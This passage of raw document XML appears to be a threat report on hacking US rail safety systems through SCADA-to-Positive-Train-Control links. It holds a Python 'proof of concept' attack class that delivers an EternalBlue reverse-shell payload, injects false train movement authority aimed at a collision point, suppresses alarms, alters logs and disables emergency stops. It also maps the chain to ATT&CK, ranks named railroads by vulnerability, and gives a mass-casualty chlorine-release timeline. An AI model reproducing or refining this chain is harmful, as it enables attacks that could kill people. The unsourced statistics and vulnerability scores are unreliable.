          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: One compromised workstation = total control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Trust Relationships</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: SCADA implicitly trusted by PTC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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9nlmxtsqhv49" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Attack Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tpq5h1lfrbpj" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The SCADA-to-PTC Kill Chain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[IMAGE: Detailed attack flow diagram on black background (#0A0A0A). Six stages left to right: 1) Initial Compromise (phishing/vulnerability), 2) SCADA Pivot (HMI control), 3) Protocol Abuse (OPC/Modbus), 4) Database Manipulation (historical data), 5) PTC Command Injection (movement authority), 6) Physical Impact (collision/derailment). Each stage shows specific techniques, tools, and timing. Use gradient colors from yellow (early) to deep red (impact). Include detection opportunities missed at each stage.]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8uxova7c01sr" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage-by-Stage Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># PTC-SCADA Exploit Chain - Proof of Concept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Demonstrates pivot from SCADA to safety systems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import struct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import socket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import time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from scapy.all import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class PTCExploit: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def __init__(self, scada_target):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self.scada_ip = scada_target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self.ptc_gateway = None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self.movement_authority = None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def stage1_compromise_hmi(self):</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"""Exploit unpatched Windows HMI"""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CVE-2017-0144 (EternalBlue) still unpatched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83% of rail HMIs vulnerable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exploit = MSFvenom.windows.x64.meterpreter_reverse_tcp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self.deliver_payload(self.scada_ip, 445, exploit)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return self.establish_c2()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def stage2_enumerate_scada(self):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"""Map SCADA network from HMI"""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Legitimate tools, no detection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networks = self.run_arp_scan()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plcs = self.identify_plcs(networks)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databases = self.find_sql_servers()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Key finding: PTC gateway accessible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self.ptc_gateway = self.discover_ptc_interface()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def stage3_abuse_protocols(self):</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"""Exploit SCADA-PTC protocol translation"""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Most implementations use cleartext OPC</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opc_client = self.connect_opc(self.ptc_gateway)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Read current train positions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train_data = opc_client.read_tags([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'PTC.Train.*.Position',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'PTC.Train.*.Speed',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'PTC.Train.*.Authority'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Identify high-value target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self.select_target_train(train_data)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def stage4_manipulate_authority(self):</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"""Inject false movement authority"""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PTC trusts SCADA completely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false_authority = self.craft_movement_authority(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train_id=self.target,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end_point=self.calculate_collision_point(),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speed_limit=79,  # Maximum non-restricted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signal_aspect='CLEAR'  # Green light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Write through SCADA to PTC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self.opc_write('PTC.Authority.Update', false_authority)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def stage5_ensure_impact(self):</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"""Prevent safety systems from intervening"""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Disable alerting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self.suppress_alarms()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Modify historical data to hide attack</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self.alter_database_logs()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Lock out manual intervention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self.disable_emergency_stops()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000127">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hyojowewh7e" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping - PTC-SCADA Specific</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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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T1190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Exploit public HMI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SCADA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T1059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PowerShell on HMI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Full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T1053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Scheduled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Survive reboot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Kernel exploits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SYSTEM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T1036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Masquerade as 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Hide in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T1003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Dump LSASS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Domain creds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T1040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Sniff SCADA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Map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T1021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RDP to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Reach PTC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T1119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Automated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Train schedules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T1071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HTTPS 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Encrypted comms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Manipulate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Cause collision</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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_w5ncu84b98lk" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Organizations: Who's At Risk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i1wfnukxd7ko" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[IMAGE: US rail map on dark background (#0A0A0A). Color-code rail lines by PTC-SCADA integration status: Red (#FF0066) for confirmed vulnerable integration, Orange (#FF9500) for likely vulnerable, Yellow (#FFB800) for unknown status, Green (#00FF94) for confirmed segmented. Overlay major cities and highlight catastrophic risk zones where hazmat trains pass through population centers. Include statistics: 41 railroads, 57,536 miles, 4.5M tons hazmat annually.]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_333p8dbmrbgf" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical Infrastructure at Risk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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Railroad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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Integration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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Population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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hazmat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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">BNSF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Full SCADA-PTC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9.7/10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45M along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780K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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Union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Centralized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9.5/10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52M along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920K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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CSX 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Regional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8.9/10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67M Eastern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1.1M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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Norfolk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Distributed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8.7/10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54M Southeast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890K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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Canadian National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Cross-border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9.1/10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650K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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Kansas City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Full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8.8/10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23M Gulf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430K tons/year</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000181">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wc7q79md95ht" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Municipal Transit Systems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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Daily Ridership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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">PTC-SCADA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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Amtrak Northeast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820,000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Congressional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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Metra Chicago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280,000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Vulnerable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Urban catastrophe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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Caltrain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65,000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Legacy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Tech hub disruption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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SEPTA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Partial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Philadelphia paralysis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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Metro-North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285,000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Full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NYC bedroom impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_38dy3zelje9h" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Industrial Railways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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Integration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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Economic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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Chemical plants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2,300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Direct PLC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$340B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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Refineries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135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SCADA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$450B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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Power plants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890 coal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Unit train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35% grid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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserv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47 intermodal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Automated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$2.1T trade flow</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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m44ehbdkyxay" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cascading Infrastructure Impacts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ibn9tbvst5kt" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When Safety Systems Fail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[IMAGE: Cascading failure diagram on dark grey (#1A1F2E). Center shows derailed hazmat train. Radiating impacts in concentric rings: Inner ring (immediate) - chlorine gas release, evacuation zone. Second ring (hours) - hospital overwhelm, traffic gridlock, cell tower overload. Third ring (days) - water system shutdown, power plant fuel shortage, supply chain breakdown. Outer ring (weeks) - economic recession, infrastructure rebuild, regulatory overhaul. Use color intensity to show severity. Include timeline markers and affected population counts.]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pnov9n3sggcb" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario Analysis: Chicago Chlorine Release</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Vector</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: SCADA compromise → PTC manipulation → Collision orchestrated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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">T+0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Two trains collide in Chicago rail yard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90-ton chlorine tank cars rupture</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Toxic plume forms immediately</w:t>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Wind carries toward Loop</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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">T+1 Hour</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Mass casualty event begins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50,000 immediate evacuations</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Hospitals overwhelmed</w:t>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Transportation gridlocked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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">T+24 Hours</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: City systems collapse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Water treatment plants offline</w:t>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O'Hare Airport closed</w:t>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Financial markets disrupted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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">T+7 Days</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Regional crisis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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2 million displaced</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$45B economic impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">National Guard deployed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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">T+30 Days</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Systemic failure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Supply chains broken</w:t>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Insurance crisis</w:t>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Congressional investigations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gvigdmfb0oqe" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical Dependencies Mapped</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Water Systems</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 40 million Americans depend on rail-delivered treatment chemicals </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Power Generation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 35% of electricity requires rail-delivered coal </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Agriculture</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 140 million tons of grain move by rail annually </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Healthcare</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Medical supplies concentrated in rail distribution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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5peel1cb0ucg" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Integration Vulnerability Deep Dive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7p5gjkv7h2rt" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Architecture Failures</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[IMAGE: Detailed technical architecture diagram on black (#0A0A0A). Show typical PTC-SCADA integration with all vulnerability points highlighted. Include: HMI workstations (Windows XP/7), OPC servers (no auth), SQL databases (injection points), protocol gateways (cleartext), message brokers (default creds), API interfaces (no rate limit). Red arrows show exploit paths. Yellow boxes show missing security controls. Include protocol details and version numbers. Add "DESIGN FLAW" stamps at critical points.]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ugcv8c35snpx" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Details</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HMI Workstations</w:t>
      </w:r>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OS: Windows XP SP2, Windows 7 (unpatched since 2019)</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Access: RDP enabled, default administrator</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Software: Wonderware InTouch 2014, iFIX 5.8</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Vulnerabilities: 2,847 known CVEs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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCADA Networks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture: Flat Layer 2 network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Protocols: Modbus TCP, DNP3 (cleartext)</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Authentication: None or default credentials</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Encryption: Not implemented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rtl w:val="0"/>
